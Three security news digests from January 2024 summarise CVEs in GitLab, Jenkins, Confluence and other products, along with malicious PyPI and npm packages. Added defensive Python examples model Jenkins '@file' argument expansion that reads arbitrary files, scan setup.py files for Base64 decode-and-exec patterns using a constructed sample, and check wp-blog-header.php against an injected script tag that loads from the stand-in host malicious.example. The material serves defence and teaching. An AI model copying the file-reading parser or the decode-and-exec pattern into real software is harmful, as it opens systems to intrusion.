Programmer’s Digest #68

01/24/2024-01/31/2024 Upgrade GitLab, Urgent Junos OS Updates, Critical Jenkins Vulnerability, Malicious PyPI Packages And More.

1. URGENT: Upgrade GitLab – Critical Workspace Creation Flaw Allows File Overwrite

GitLab has once again released fixes to address a critical security flaw in its Community Edition (CE) and Enterprise Edition (EE) that could be exploited to write arbitrary files while creating a workspace. Tracked as CVE-2024-0402, the vulnerability has a CVSS score of 9.9 out of a maximum of 10. The company also noted that patches for the bug have been backported to 16.5.8, 16.6.6, 16.7.4, and 16.8.1. Also resolved by GitLab are four medium-severity flaws that could lead to a regular expression denial-of-service (ReDoS), HTML injection, and the disclosure of a user’s public email address via the tags RSS feed. The latest update arrives two weeks after the DevSecOps platform shipped fixes to close out two critical shortcomings, including one that could be exploited to take over accounts without requiring any user interaction (CVE-2023-7028, CVSS score: 10.0). Users are advised to upgrade their installations to a patched version as soon as possible to mitigate potential risks.

2. Juniper Networks Releases Urgent Junos OS Updates for High-Severity Flaws

Juniper Networks has issued critical updates for SRX Series and EX Series, targeting high-severity vulnerabilities in J-Web (CVE-2024-21619 and CVE-2024-21620). These flaws could empower threat actors to seize control of vulnerable systems. CVE-2024-21619 poses a moderate risk (CVSS score: 5.3) due to a missing authentication vulnerability, exposing sensitive configuration information. On the other hand, CVE-2024-21620 presents a higher risk (CVSS score: 8.8) as a cross-site scripting (XSS) vulnerability, enabling the execution of arbitrary commands. As a temporary measure, Juniper advises users to disable J-Web or limit access to trusted hosts until the updates are implemented. Additionally, two earlier disclosed vulnerabilities (CVE-2023-36846 and CVE-2023-36851) were previously flagged as actively exploited.

3. Critical Jenkins Vulnerability Exposes Servers to RCE Attacks – Patch ASAP!

Jenkins, the open-source CI/CD automation software, has patched nine security flaws, including CVE-2024-23897, a critical bug allowing remote code execution through an arbitrary file read vulnerability in the CLI. Jenkins uses the args4j library for CLI command processing, enabling a feature (expandAtFiles) that replaces ‘@’ followed by a file path with the file’s content. This feature, active by default in Jenkins 2.441 and earlier, could be exploited by threat actors with “Overall/Read” permission to read entire files, potentially leading to various attacks, including remote code execution, XSS, and CSRF protection bypass. SonarSource researcher Yaniv Nizry discovered the flaw, fixed in Jenkins 2.442 and LTS 2.426.3 by disabling the command parser feature. While awaiting the patch, users are advised to disable CLI access as a temporary measure. Proof-of-concept exploits for CVE-2024-23897 have been published, emphasizing the urgency of updates.
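To make the argument-expansion behaviour concrete, here is an added example (not Jenkins or args4j code) that models the feature the digest describes: a parser where any argument of the form `@<path>` is replaced by that file's contents, beside a parser with the expansion disabled, plus a version check against the fixed releases the digest names (2.442 and LTS 2.426.3). The file, the arguments and the `needs_upgrade` helper are all constructed for this example.

```python
"""Behaviour model of '@file' argument expansion and its hardened form.

Added example: not Jenkins or args4j code, only a model with the same shape.
The temp file, the argument list and needs_upgrade() are constructed here.
"""
import os
import tempfile
from typing import Dict, List


def expand_at_files(args: List[str]) -> List[str]:
    """Risky default: an argument '@<path>' is replaced by the whitespace-
    separated tokens read from <path>. Anyone allowed to pass arguments can
    make the process read any file it has permission to open."""
    expanded: List[str] = []
    for arg in args:
        if arg.startswith("@"):
            with open(arg[1:], "r", encoding="utf-8", errors="replace") as fh:
                expanded.extend(fh.read().split())
        else:
            expanded.append(arg)
    return expanded


def parse_literal(args: List[str]) -> List[str]:
    """Hardened form (what disabling the feature amounts to): '@...' is an
    ordinary argument and no file is ever opened."""
    return list(args)


def needs_upgrade(version: str) -> bool:
    """True when a Jenkins version string is below the fixed releases named
    in the digest: weekly 2.442, LTS 2.426.3 (LTS versions have three parts).
    Constructed helper; it knows nothing about other release lines."""
    parts = tuple(int(p) for p in version.split("."))
    if len(parts) == 3:
        return parts < (2, 426, 3)
    return parts < (2, 442)


def demo() -> Dict[str, object]:
    """Constructed scenario: a file standing in for data the CLI caller must
    not be able to read, handed to both parsers as '@<path>'."""
    with tempfile.NamedTemporaryFile("w", delete=False, suffix=".txt") as fh:
        fh.write("constructed-secret\n")
        path = fh.name
    try:
        risky = expand_at_files(["show", "@" + path])
        safe = parse_literal(["show", "@" + path])
    finally:
        os.unlink(path)
    return {
        "risky": risky,  # file content has been pulled into the argument list
        "safe_keeps_literal": safe == ["show", "@" + path],
    }


if __name__ == "__main__":
    print(demo())
    print("2.441 needs upgrade:", needs_upgrade("2.441"))
```

The point of the side-by-side is that the hardened parser never opens anything: the digest's advice to disable CLI access until patched is the operational equivalent of removing the `expand_at_files` path entirely.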

4. Malicious PyPI Packages Slip WhiteSnake InfoStealer Malware onto Windows Machines

Researchers have detected malicious packages on the Python Package Index (PyPI), distributing WhiteSnake Stealer malware on Windows systems. These packages, uploaded by a threat actor named “WS,” include nigpal, figflix, telerer, seGMM, fbdebug, sGMM, myGens, NewGends, and TestLibs111. The packages embed Base64-encoded source code in their setup.py files, delivering the final payload upon installation based on the victim’s operating system. WhiteSnake, primarily targeting Windows, has an Anti-VM mechanism, communicates via Tor, and steals information from browsers, cryptocurrency wallets, and various applications. PYTA31, the threat actor tracked by Checkmarx, aims to exfiltrate sensitive and crypto wallet data. Some packages incorporate clipper functionality to replace clipboard content for unauthorized transactions. This discovery highlights the ability of a single malware author to disseminate multiple info-stealing packages into PyPI with distinct payload intricacies.
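The install-time pattern described above (a Base64 blob in `setup.py` that is decoded and executed) is something a defender can screen for before a package is installed. The following is an added example, not Checkmarx's or PyPI's tooling: an AST-based heuristic that flags `exec`/`eval`/subprocess calls fed by Base64-decoded data, directly or through an assigned variable, and long Base64-looking string literals. Both `setup.py` samples are constructed here and the decoded payload is a harmless `print`.

```python
"""Heuristic scanner for setup.py files that decode and execute a Base64 blob.

Added example, not Checkmarx's or PyPI's code. The two setup.py samples and
the payload are constructed for this demonstration.
"""
import ast
import base64
import re
from typing import List, Set

DECODERS = {"base64.b64decode", "b64decode", "base64.decodebytes"}
EXECUTORS = {"exec", "eval", "os.system", "subprocess.run",
             "subprocess.Popen", "subprocess.call"}
LONG_B64 = re.compile(r"^[A-Za-z0-9+/=\s]{200,}$")


def _dotted_name(func: ast.AST) -> str:
    """'base64.b64decode' for base64.b64decode(...), 'exec' for exec(...)."""
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        base = _dotted_name(func.value)
        return f"{base}.{func.attr}" if base else func.attr
    return ""


def _contains_decoder(node: ast.AST) -> bool:
    """True if any call inside node is a Base64 decode (covers .decode() chains)."""
    return any(isinstance(c, ast.Call) and _dotted_name(c.func) in DECODERS
               for c in ast.walk(node))


def scan_setup_py(source: str) -> List[str]:
    """Return one finding string per suspicious construct; [] means nothing seen."""
    tree = ast.parse(source)
    findings: List[str] = []

    # Pass 1: names assigned from a Base64 decode, e.g. code = b64decode(blob).decode()
    tainted: Set[str] = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Assign) and _contains_decoder(node.value):
            tainted.update(t.id for t in node.targets if isinstance(t, ast.Name))

    # Pass 2: executors fed by decoded data, and long Base64-looking literals
    for node in ast.walk(tree):
        if isinstance(node, ast.Call) and _dotted_name(node.func) in EXECUTORS:
            fed = (any(isinstance(a, ast.Name) and a.id in tainted for a in node.args)
                   or any(_contains_decoder(a) for a in node.args))
            if fed:
                findings.append(
                    f"line {node.lineno}: {_dotted_name(node.func)}() fed by Base64-decoded data")
        elif (isinstance(node, ast.Constant) and isinstance(node.value, str)
              and LONG_B64.match(node.value)):
            findings.append(
                f"line {node.lineno}: long Base64-looking string literal ({len(node.value)} chars)")
    return findings


# Constructed samples: the "malicious" one decodes and exec()s a harmless print.
PAYLOAD_B64 = base64.b64encode(b'print("constructed sample payload")').decode()

MALICIOUS_SETUP = f'''
import base64
from setuptools import setup
blob = "{PAYLOAD_B64}"
code = base64.b64decode(blob).decode()
exec(code)
setup(name="constructed-sample", version="0.1")
'''

BENIGN_SETUP = '''
from setuptools import setup
setup(name="constructed-benign", version="0.1", packages=["pkg"])
'''

if __name__ == "__main__":
    print("malicious:", scan_setup_py(MALICIOUS_SETUP))
    print("benign:   ", scan_setup_py(BENIGN_SETUP))
```

Run it over every `setup.py` (and `pyproject.toml` build hooks) in a dependency download before installation; a hit is a reason to inspect the package, not proof of malice, since legitimate packages occasionally embed encoded data, but decoded data flowing into `exec` at install time is rarely benign.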

5. Researchers Uncover How Outlook Vulnerability Could Leak Your NTLM Passwords

A recently patched security flaw in Microsoft Outlook (CVE-2023-35636, CVSS score: 6.5) exposed NT LAN Manager (NTLM) v2 hashed passwords. This vulnerability, addressed in Microsoft’s December 2023 Patch Tuesday updates, allowed threat actors to access passwords when victims opened a specially crafted file. In email attacks, the attacker sends the file, while in web-based attacks, a malicious website hosts it. The flaw originates from the calendar-sharing function in Outlook, utilizing crafted headers. Varonis researcher Dolev Taler discovered the bug, highlighting the potential leakage of NTLM hashes via Windows Performance Analyzer (WPA) and Windows File Explorer, yet these methods remain unpatched. This disclosure coincides with Check Point’s revelation of “forced authentication,” demonstrating the exploitation of NTLM tokens by tricking users into opening a rogue Microsoft Access file.

6. Critical Cisco Flaw Lets Hackers Remotely Take Over Unified Comms Systems

Cisco has issued patches for a critical vulnerability (CVE-2024-20253, CVSS score: 9.9) affecting Unified Communications and Contact Center Solutions. The flaw arises from improper processing of user-provided data, enabling a remote attacker to execute arbitrary code on the target device. Successful exploitation could lead to arbitrary command execution with web services user privileges and potential root access. The affected products include Unified Communications Manager, Unified Communications Manager IM & Presence Service, Unified Communications Manager Session Management Edition, Unified Contact Center Express, Unity Connection, and Virtualized Voice Browser. Synacktiv researcher Julien Egloff discovered the vulnerability. While no workarounds exist, Cisco recommends implementing access control lists (ACLs) as a temporary measure.


Programmer’s Digest #67

01/17/2024-01/24/2024 Malicious NPM Packages, ~40,000 Attacks in 3 Days, MavenGate Attack Could Let Hackers Hijack Java And More.

1. Patch Your GoAnywhere MFT Immediately – Critical Flaw Lets Anyone Be Admin

A critical security flaw has been disclosed in Fortra’s GoAnywhere Managed File Transfer (MFT) software that could be abused to create a new administrator user. Tracked as CVE-2024-0204, the issue carries a CVSS score of 9.8 out of 10. Authentication bypass in Fortra’s GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal. The issue is the result of a path traversal weakness in the “/InitialAccountSetup.xhtml” endpoint that could be exploited to create administrative users. Users who cannot upgrade to version 7.4.1 can apply temporary workarounds in non-container deployments by deleting the InitialAccountSetup.xhtml file in the install directory and restarting the services.

2. Malicious NPM Packages Exfiltrate Hundreds of Developer SSH Keys via GitHub

Two malicious npm packages, warbeast2000 and kodiak2k, were discovered using GitHub to store Base64-encoded SSH keys stolen from developers. Uploaded at the beginning of the month, the packages attracted 412 and 1,281 downloads before npm took them down on January 21, 2024. Security firm ReversingLabs revealed eight versions of warbeast2000 and over 30 versions of kodiak2k. Both execute postinstall scripts, with warbeast2000 attempting to access private SSH keys and kodiak2k searching for a key named “meow.” Lucija Valentić, a security researcher, explained that warbeast2000 uploads the key to an attacker-controlled GitHub repo. Kodiak2k’s later versions execute a script from an archived GitHub project, launching the Mimikatz tool to extract credentials. Valentić emphasizes that this incident showcases cybercriminals exploiting open-source package managers for malicious software supply chain attacks on development and end-user organizations.

3. ~40,000 Attacks in 3 Days: Critical Confluence RCE Under Active Exploitation

Malicious actors have begun to actively exploit a recently disclosed critical security flaw impacting Atlassian Confluence Data Center and Confluence Server. Tracked as CVE-2023-22527 (CVSS score: 10.0), the vulnerability impacts out-of-date versions of the software, allowing unauthenticated attackers to achieve remote code execution on susceptible installations. The shortcoming affects Confluence Data Center and Server 8 versions released before December 5, 2023, as well as 8.4.5. Over 11,000 Atlassian instances have been found to be accessible over the internet as of January 21, 2024, although it’s currently not known how many of them are vulnerable to CVE-2023-22527. This vulnerability has the potential to permit unauthenticated attackers to inject OGNL expressions into the Confluence instance, thereby enabling the execution of arbitrary code and system commands.

4. PixieFail UEFI Flaws Expose Millions of Computers to RCE, DoS, and Data Theft

Multiple security vulnerabilities, collectively named PixieFail by Quarkslab, have been revealed in the TCP/IP network protocol stack of the widely used Unified Extensible Firmware Interface (UEFI) specification. These nine issues, found in the TianoCore EFI Development Kit II (EDK II), can lead to remote code execution, denial-of-service (DoS), DNS cache poisoning, and sensitive information leakage. UEFI firmware from major providers like AMI, Intel, Insyde, and Phoenix Technologies is affected. The vulnerabilities stem from overflow bugs, out-of-bounds reads, infinite loops, and a weak pseudorandom number generator in EDK II’s NetworkPkg, and affect the Preboot eXecution Environment (PXE) network-boot stage. The vulnerabilities have specific identifiers (CVEs) and varying CVSS scores. The impact and exploitability depend on firmware builds and default PXE boot configurations, with potential for remote code execution, DoS, DNS cache poisoning, or data extraction.

5. MavenGate Attack Could Let Hackers Hijack Java and Android via Abandoned Libraries

Numerous widely-used Java and Android libraries are vulnerable to a novel software supply chain attack called MavenGate. Oversecured reported that domain name purchases could be used to hijack project access, exploiting default build configurations and making attacks difficult to detect. The attack can inject malicious code into dependencies, compromising the build process via a malicious plugin. All Maven-based technologies, including Gradle, are susceptible, affecting over 200 companies like Google, Facebook, and Amazon. Apache Maven, vital for Java projects, is a target due to potentially compromised dependencies in public repositories. The attack involves obtaining expired domains, asserting rights through a DNS TXT record, and gaining access to vulnerable groupIds. While Maven Central believes the outlined attack is infeasible due to automation, Oversecured suggests developers and end-users play crucial roles in ensuring security for direct and transitive dependencies, emphasizing the responsibility of both parties.

6. U.S. Cybersecurity Agency Warns of Actively Exploited Ivanti EPMM Vulnerability

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical flaw, CVE-2023-35082, affecting Ivanti Endpoint Manager Mobile (EPMM) and MobileIron Core to its Known Exploited Vulnerabilities catalog. The flaw, now patched, is an authentication bypass that could potentially expose users’ personal information. Ivanti disclosed the vulnerability in August 2023, urging users to update to version 11.11.0.0. The flaw could be chained with CVE-2023-35081 to allow attackers to write malicious web shell files. Though there’s no detail on real-world exploits, federal agencies are advised to apply fixes by February 8, 2024. Two zero-day flaws in Ivanti Connect Secure VPN devices are also under mass exploitation, prompting the company to release updates next week. The attacks, initially linked to a Chinese threat actor, have since attracted additional threat actors globally, compromising over 2,100 devices across various sectors. Organizations are urged to apply Ivanti’s provided mitigation after importing backup configurations to prevent re-compromise.


Programmer’s Digest #66

01/10/2024-01/17/2024 Citrix, VMware, and Atlassian Hit with Critical Flaws, SonicWall Firewalls Potentially Vulnerable, Critical RCE Vulnerability And More.

1. GitHub Rotates Keys After High-Severity Vulnerability Exposes Credentials

GitHub responded to a security vulnerability by rotating keys, including the GitHub commit signing key and customer encryption keys for GitHub Actions, Codespaces, and Dependabot. Discovered on December 26, 2023, the high-severity vulnerability (CVE-2024-0200, CVSS score: 7.2) was promptly addressed. While there’s no evidence of exploitation, GitHub urges users to import the new keys. GitHub Enterprise Server (GHES) is also affected, but exploiting it requires an authenticated user with an organization owner role logged into a GHES instance, limiting potential risks. Another high-severity bug (CVE-2024-0507, CVSS score: 6.5) was patched, allowing an attacker with Management Console user account access and editor role to escalate privileges through command injection. GitHub emphasizes user security following previous incidents, such as replacing the RSA SSH host key.

2. Citrix, VMware, and Atlassian Hit with Critical Flaws — Patch ASAP!

Citrix is warning of two zero-day security vulnerabilities in NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway) that are being actively exploited in the wild. The flaws are listed below:

  • CVE-2023-6548 (CVSS score: 5.5) – Authenticated (low privileged) remote code execution on Management Interface (requires access to NSIP, CLIP, or SNIP with management interface access)
  • CVE-2023-6549 (CVSS score: 8.2) – Denial-of-service (requires that the appliance be configured as a Gateway or authorization and accounting, or AAA, virtual server).

Users of NetScaler ADC and NetScaler Gateway version 12.1 are recommended to upgrade their appliances to a supported version that patches the flaws. In recent months, multiple security vulnerabilities in Citrix appliances (CVE-2023-3519 and CVE-2023-4966) have been weaponized by threat actors to drop web shells and hijack existing authenticated sessions.

3. Alert: Over 178,000 SonicWall Firewalls Potentially Vulnerable to Exploits – Act Now

Over 178,000 exposed SonicWall firewalls face potential exploitation from two security flaws, leading to denial-of-service (DoS) conditions and remote code execution (RCE). Jon Williams, a senior security engineer at Bishop Fox, highlights the commonality in the vulnerabilities, manifested in different HTTP URI paths due to code pattern reuse. The flaws, namely CVE-2022-22274 (CVSS score: 9.4) and CVE-2023-0656 (CVSS score: 7.5), involve stack-based buffer overflows in SonicOS. These vulnerabilities allow remote, unauthenticated attackers to induce DoS or potentially execute code, posing significant risks. The cybersecurity firm warns of potential weaponization, causing repeated crashes and forcing the appliance into maintenance mode, necessitating administrative intervention to restore normal functionality.

4. Balada Injector Infects Over 7,100 WordPress Sites Using Plugin Vulnerability

Thousands of WordPress sites, using a vulnerable version of the Popup Builder plugin, face compromise by the Balada Injector malware. First identified by Doctor Web in January 2023, this ongoing campaign exploits security flaws in WordPress plugins to inject a backdoor, redirecting visitors to fraudulent tech support pages and scams. Sucuri’s recent findings reveal the extensive operation, active since 2017, infiltrating over 1 million sites. Balada Injector exploits a high-severity flaw in Popup Builder (CVE-2023-6000, CVSS score: 8.8), disclosed by WPScan and patched in version 4.2.3. The attackers aim to insert a malicious JavaScript file hosted on specialcraftbox[.]com, gaining control over sites and facilitating malicious redirects. Persistent control involves uploading backdoors and creating rogue administrators. In the latest wave, logged-in admin cookies trigger the installation of a rogue backdoor plugin, fetching a second-stage payload. This payload, saved as “sasas,” scans for site directories, modifying wp-blog-header.php to inject the Balada JavaScript malware.
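Because the digest names a specific file the payload modifies (`wp-blog-header.php`), a simple integrity check is a practical detection. The following is an added example, not Sucuri's or WordPress's code: it compares the file's SHA-256 against a known-good hash the operator records at deployment time and, independently, flags any `<script src=...>` reference, since a stock `wp-blog-header.php` contains no HTML at all. The two file contents are constructed stand-ins (the clean one only imitates the shape of the real file), and `malicious.example` is a placeholder domain.

```python
"""Integrity and injection check for wp-blog-header.php.

Added example, not Sucuri's or WordPress's code. CLEAN_HEADER is a
constructed stand-in for the file, INJECTED_HEADER a constructed infected
copy, and the known-good hash is computed from the clean stand-in.
"""
import hashlib
import re
from typing import Dict, List

# Matches <script ... src="..."> with single, double or no quotes
SCRIPT_SRC = re.compile(r"<script[^>]*\bsrc\s*=\s*['\"]?([^'\" >]+)", re.IGNORECASE)


def find_injected_scripts(php_source: str) -> List[str]:
    """Return every external script source referenced in the file. A stock
    wp-blog-header.php is pure PHP, so any match is foreign."""
    return SCRIPT_SRC.findall(php_source)


def sha256_of(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def verify_header_file(php_source: str, known_good_sha256: str) -> Dict[str, object]:
    """Combine the hash comparison with the script scan; 'clean' requires both."""
    matches = sha256_of(php_source) == known_good_sha256
    srcs = find_injected_scripts(php_source)
    return {
        "sha256_matches": matches,
        "injected_script_srcs": srcs,
        "clean": matches and not srcs,
    }


# Constructed stand-in for a clean file (shape only, not the real WordPress source)
CLEAN_HEADER = """<?php
if ( ! isset( $wp_did_header ) ) {
    $wp_did_header = true;
    require_once __DIR__ . '/wp-load.php';
    wp();
}
"""

# Constructed infected copy: a loader tag echoed before the original code
INJECTED_HEADER = (
    '<?php echo \'<script src="https://malicious.example/loader.js"></script>\'; ?>\n'
    + CLEAN_HEADER
)

# Recorded at deployment time in a real setup; computed here from the stand-in
KNOWN_GOOD_SHA256 = sha256_of(CLEAN_HEADER)

if __name__ == "__main__":
    print("clean file:   ", verify_header_file(CLEAN_HEADER, KNOWN_GOOD_SHA256))
    print("infected file:", verify_header_file(INJECTED_HEADER, KNOWN_GOOD_SHA256))
```

The hash check catches any modification, including ones the regex would miss (obfuscated PHP that builds the tag at runtime), while the script scan still gives a useful signal when no baseline hash was recorded. Rogue administrator accounts and unknown plugins, the persistence mechanisms the digest mentions, need their own checks against the users and plugins tables.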

5. Critical RCE Vulnerability Uncovered in Juniper SRX Firewalls and EX Switches

Juniper Networks has released updates to fix a critical remote code execution (RCE) vulnerability in its SRX Series firewalls and EX Series switches. The issue, tracked as CVE-2024-21591, is rated 9.8 on the CVSS scoring system. An out-of-bounds write vulnerability in J-Web of Juniper Networks Junos OS SRX Series and EX Series allows an unauthenticated, network-based attacker to cause a Denial-of-Service (DoS) or Remote Code Execution (RCE) and obtain root privileges on the device. The issue is caused by use of an insecure function allowing a bad actor to overwrite arbitrary memory. As temporary workarounds until the fixes are deployed, the company recommends that users disable J-Web or restrict access to only trusted hosts. Additionally, Juniper Networks resolved a high-severity bug (CVE-2024-21611, CVSS score: 7.5) in Junos OS and Junos OS Evolved, potentially causing a DoS condition. Although there’s no evidence of exploitation, the company addresses these vulnerabilities following security issues with SRX firewalls and EX switches exploited by threat actors last year.

6. New PoC Exploit for Apache OfBiz Vulnerability Poses Risk to ERP Systems

Researchers have developed a proof-of-concept (PoC) exploiting a critical flaw (CVE-2023-51467, CVSS score: 9.8) in the Apache OFBiz ERP system, allowing execution of a memory-resident payload. This vulnerability serves as a bypass for another severe flaw (CVE-2023-49070, CVSS score: 9.8) in the same software, enabling authentication circumvention and remote code execution. Though fixed in Apache OFBiz version 18.12.11, threat actors are attempting to exploit it in vulnerable instances. VulnCheck’s latest findings reveal that CVE-2023-51467 permits executing a payload directly from memory, leaving minimal traces. Apache OFBiz has a history of exploited vulnerabilities, with the recent bug joining the ranks. Despite security measures, the incomplete nature of the sandbox in the system allows potential attackers to run curl commands and obtain a bash reverse shell on Linux systems.

7. Act Now: CISA Flags Active Exploitation of Microsoft SharePoint Vulnerability

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical privilege escalation vulnerability (CVE-2023-29357, CVSS score: 9.8) in Microsoft SharePoint Server to its Known Exploited Vulnerabilities catalog due to ongoing attacks. The flaw allows attackers with access to spoofed JWT authentication tokens to execute a network attack, bypassing authentication and gaining administrator privileges without any user action. Microsoft patched the bug in June 2023, part of its Patch Tuesday updates. While real-world exploitation details and threat actor identities are unknown, federal agencies are urged to apply patches by January 31, 2024. Microsoft emphasizes protection for customers with automatic updates enabled.
